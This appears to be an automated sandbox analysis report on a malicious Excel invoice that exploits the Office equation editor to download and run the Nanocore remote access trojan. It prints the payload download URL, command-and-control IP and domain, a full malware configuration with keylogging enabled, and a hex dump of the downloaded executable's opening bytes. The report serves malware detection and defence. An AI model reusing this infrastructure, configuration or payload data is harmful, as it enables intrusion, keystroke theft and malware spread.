Analysis Report SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx

Overview

General Information

Sample Name: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx
Analysis ID: 385193
MD5: 216f2652001700d1f7ac1109a508ce2d
SHA1: 82d3a0b7bb096d03f9f1a4de5444c216849d576b
SHA256: 9b393f90c5fa6aabf671d0f80a9ee0e4f44330cd3ee14dc0d9066f978d9435ff
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://covid19vaccinations.hopto.org/nano.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "f57d5a77-8670-45ef-b736-5f3a07b6", "Group": "Addora", "Domain1": "79.134.225.30", "Domain2": "nassiru1155.ddns.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Multi AV Scanner detection for domain / URL
Source: http://covid19vaccinations.hopto.org/nano.exe Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for submitted file
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Virustotal: Detection: 29% Perma Link
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx ReversingLabs: Detection: 22%
Yara detected Nanocore RAT
Source: Yara match File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gmSlQSien.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.RegSvcs.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 7.2.RegSvcs.exe.840000.3.unpack Avira: Label: TR/NanoCore.fadte

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: System.pdbWindows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: ystem.pdb- source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: =T3UpC:\Windows\System.pdbA!`y source: RegSvcs.exe, 00000007.00000002.2395879525.0000000004FDC000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\RegSvcs.pdbN source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: ps.pdb source: RegSvcs.exe, 00000007.00000002.2394056812.00000000008BD000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2225121272.0000000001D90000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb``[ source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000007.00000003.2194043943.00000000006E3000.00000004.00000001.sdmp, smtpsvc.exe, smtpsvc.exe.7.dr
Source: Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2194187602.0000000000B10000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2394185585.0000000002130000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000007.00000002.2393642149.00000000003D6000.00000004.00000040.sdmp

Software Vulnerabilities:

barindex
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 73MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 4_2_00B762C8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 4_2_00B76408
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 4_2_00B763F8
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: covid19vaccinations.hopto.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.235.115.155:80

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: nassiru1155.ddns.net
Source: Malware configuration extractor URLs: 79.134.225.30
Uses dynamic DNS services
Source: unknown DNS query: name: nassiru1155.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 79.134.225.30:1144
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 06:02:45 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.4.16Last-Modified: Mon, 12 Apr 2021 05:41:25 GMTETag: "c3e00-5bfbff6ea5e4b"Accept-Ranges: bytesContent-Length: 802304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 dd 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 32 0b 00 00 0a 01 00 00 00 00 00 92 50 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 50 0b 00 4f 00 00 00 00 60 0b 00 ec 07 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 30 0b 00 00 20 00 00 00 32 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ec 07 01 00 00 60 0b 00 00 08 01 00 00 34 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0c 00 00 02 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 50 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 1c 7d 00 00 64 75 00 00 03 00 00 00 01 00 00 06 80 f2 00 00 c0 5d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1e 00 00 0a 28 1f 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 20 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 21 00 00 0a 00 02 16 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 26 00 00 0a 00 2a 26 00 02 28 27 00 00 0a 00 2a ce 73 28 00 00 0a 80 01 00 00 04 73 29 00 00 0a 80 02 00 00 04 73 2a 00 00 0a 80 03 00 00 04 73 2b 00 00 0a 80 04 00 00 04 73 2c 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 30 00 00 0a 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 79.134.225.30 79.134.225.30
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /nano.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19vaccinations.hopto.orgConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: unknown TCP traffic detected without corresponding DNS query: 79.134.225.30
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3B54A74.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /nano.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19vaccinations.hopto.orgConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: covid19vaccinations.hopto.org
Source: vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2202209803.0000000005540000.00000002.00000001.sdmp, RegSvcs.exe, 00000007.00000002.2395892834.0000000004FE0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a raw input device (often for capturing keystrokes)
Source: RegSvcs.exe, 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RAT
Source: Yara match File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.27d1644.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.5c0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nano[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D088E NtQueryInformationProcess, 4_2_006D088E
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D1E96 NtQuerySystemInformation, 4_2_006D1E96
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D086C NtQueryInformationProcess, 4_2_006D086C
Source: C:\Users\Public\vbc.exe Code function: 4_2_006D1E63 NtQuerySystemInformation, 4_2_006D1E63
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F144A NtQuerySystemInformation, 7_2_004F144A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F140F NtQuerySystemInformation, 7_2_004F140F
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_011D85C8 4_2_011D85C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E8418 4_2_002E8418
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E6C48 4_2_002E6C48
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E4450 4_2_002E4450
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EED58 4_2_002EED58
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E6550 4_2_002E6550
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E75A8 4_2_002E75A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E55D9 4_2_002E55D9
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EDA30 4_2_002EDA30
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5210 4_2_002E5210
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5260 4_2_002E5260
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA739 4_2_002EA739
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E4790 4_2_002E4790
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EDCC8 4_2_002EDCC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EB179 4_2_002EB179
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9170 4_2_002E9170
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA571 4_2_002EA571
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA140 4_2_002EA140
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA150 4_2_002EA150
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9180 4_2_002E9180
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA580 4_2_002EA580
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E5980 4_2_002E5980
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EE268 4_2_002EE268
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA339 4_2_002EA339
Source: C:\Users\Public\vbc.exe Code function: 4_2_002EA348 4_2_002EA348
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9BB0 4_2_002E9BB0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9BC0 4_2_002E9BC0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B71078 4_2_00B71078
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B739B8 4_2_00B739B8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B72FB8 4_2_00B72FB8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B743A0 4_2_00B743A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B71500 4_2_00B71500
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B73368 4_2_00B73368
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B706C0 4_2_00B706C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B706C8 4_2_00B706C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B70070 4_2_00B70070
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B71798 4_2_00B71798
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B71789 4_2_00B71789
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B74770 4_2_00B74770
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B7497E 4_2_00B7497E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00B74967 4_2_00B74967
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0A28 4_2_002E0A28
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C2418 7_2_003C2418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003CB410 7_2_003CB410
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_003C38C8 7_2_003C38C8
